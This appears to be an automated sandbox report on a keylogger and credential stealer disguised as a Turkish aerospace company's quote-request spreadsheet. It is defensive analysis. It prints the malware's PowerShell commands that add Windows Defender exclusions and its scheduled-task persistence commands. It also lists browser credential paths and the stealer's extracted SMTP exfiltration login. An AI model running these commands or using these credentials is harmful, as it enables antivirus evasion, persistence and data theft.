Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Overview

General Information

Sample name:T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
renamed because original name is a hash value
Original sample name:Trk Havaclk ve Uzay Sanayii A TEKLF TALEB-19-02-2025_xlsx.exe
Analysis ID:1618934
MD5:1827b652ba6dea19fd150f4872ad8a90
SHA1:386a46ca23659236a90f49e80516630da9f557f2
SHA256:af991ddeba10d3b5f7d23603c840755386967bcb17175e3ff91dd52da78375b4
Tags:exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe (PID: 3948 cmdline: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)
    • powershell.exe (PID: 4148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5732 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WheTgQY.exe (PID: 5456 cmdline: C:\Users\user\AppData\Roaming\WheTgQY.exe MD5: 1827B652BA6DEA19FD150F4872AD8A90)
    • schtasks.exe (PID: 7320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WheTgQY.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)
    • WheTgQY.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)
    • WheTgQY.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000010.00000002.4483172378.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000010.00000002.4483172378.000000000043D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 26 entries
            SourceRuleDescriptionAuthorStrings
            0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2bea0:$a1: get_encryptedPassword
                  • 0x2c428:$a2: get_encryptedUsername
                  • 0x2bb13:$a3: get_timePasswordChanged
                  • 0x2bc2a:$a4: get_passwordField
                  • 0x2beb6:$a5: set_encryptedPassword
                  • 0x2ebd2:$a6: get_passwords
                  • 0x2ef66:$a7: get_logins
                  • 0x2ebbe:$a8: GetOutlookPasswords
                  • 0x2e577:$a9: StartKeylogger
                  • 0x2eebf:$a10: KeyLoggerEventArgs
                  • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                  0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x3976d:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 43 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ProcessId: 4148, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ProcessId: 4148, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WheTgQY.exe, ParentImage: C:\Users\user\AppData\Roaming\WheTgQY.exe, ParentProcessId: 5456, ParentProcessName: WheTgQY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp", ProcessId: 7320, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", ProcessId: 5732, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ProcessId: 4148, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", ProcessId: 5732, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T10:38:20.969314+010028033053Unknown Traffic192.168.2.549710104.21.80.1443TCP
                  2025-02-19T10:38:23.373519+010028033053Unknown Traffic192.168.2.549717104.21.80.1443TCP
                  2025-02-19T10:38:24.862896+010028033053Unknown Traffic192.168.2.549721104.21.80.1443TCP
                  2025-02-19T10:38:29.654879+010028033053Unknown Traffic192.168.2.549734104.21.80.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T10:38:19.404304+010028032742Potentially Bad Traffic192.168.2.549707132.226.8.16980TCP
                  2025-02-19T10:38:20.370820+010028032742Potentially Bad Traffic192.168.2.549707132.226.8.16980TCP
                  2025-02-19T10:38:21.904132+010028032742Potentially Bad Traffic192.168.2.549712132.226.8.16980TCP
                  2025-02-19T10:38:21.935499+010028032742Potentially Bad Traffic192.168.2.549711132.226.8.16980TCP
                  2025-02-19T10:38:22.935405+010028032742Potentially Bad Traffic192.168.2.549711132.226.8.16980TCP
                  2025-02-19T10:38:24.287539+010028032742Potentially Bad Traffic192.168.2.549719132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T10:38:32.009238+010018100071Potentially Bad Traffic192.168.2.549742149.154.167.220443TCP
                  2025-02-19T10:38:34.712283+010018100071Potentially Bad Traffic192.168.2.549749149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
                  Source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeReversingLabs: Detection: 35%
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeVirustotal: Detection: 36%Perma Link
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeReversingLabs: Detection: 35%
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeVirustotal: Detection: 36%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackString decryptor: royals@htcp.homes
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackString decryptor: 7213575aceACE@@
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackString decryptor: mail.htcp.homes
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackString decryptor: royal@htcp.homes
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackString decryptor: 587
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpackString decryptor:

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: tsUY.pdbSHA256 source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2064388302.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tsUY.pdb source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 077C1F0Ah0_2_077C2155
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 077C1F0Ah0_2_077C27CB
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 0111F8E9h10_2_0111F630
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 0111FD41h10_2_0111FA88
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DE959h10_2_055DE6B0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DD7F9h10_2_055DD550
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055D31E0h10_2_055D2DC8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055D31E0h10_2_055D2DC2
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DCF49h10_2_055DCCA0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DF209h10_2_055DEF60
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DE0A9h10_2_055DDE00
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055D2C19h10_2_055D2968
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055D31E0h10_2_055D310E
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DDC51h10_2_055DD9A8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_055D0040
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DFAB9h10_2_055DF810
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DD3A1h10_2_055DD0F8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DEDB1h10_2_055DEB08
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055D0D0Dh10_2_055D0B30
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055D1697h10_2_055D0B30
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DF661h10_2_055DF3B8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 4x nop then jmp 055DE501h10_2_055DE258
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 00DAF8E9h16_2_00DAF631
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 00DAFD41h16_2_00DAFA88
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651E0A9h16_2_0651DE00
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 065131E0h16_2_06512DC8
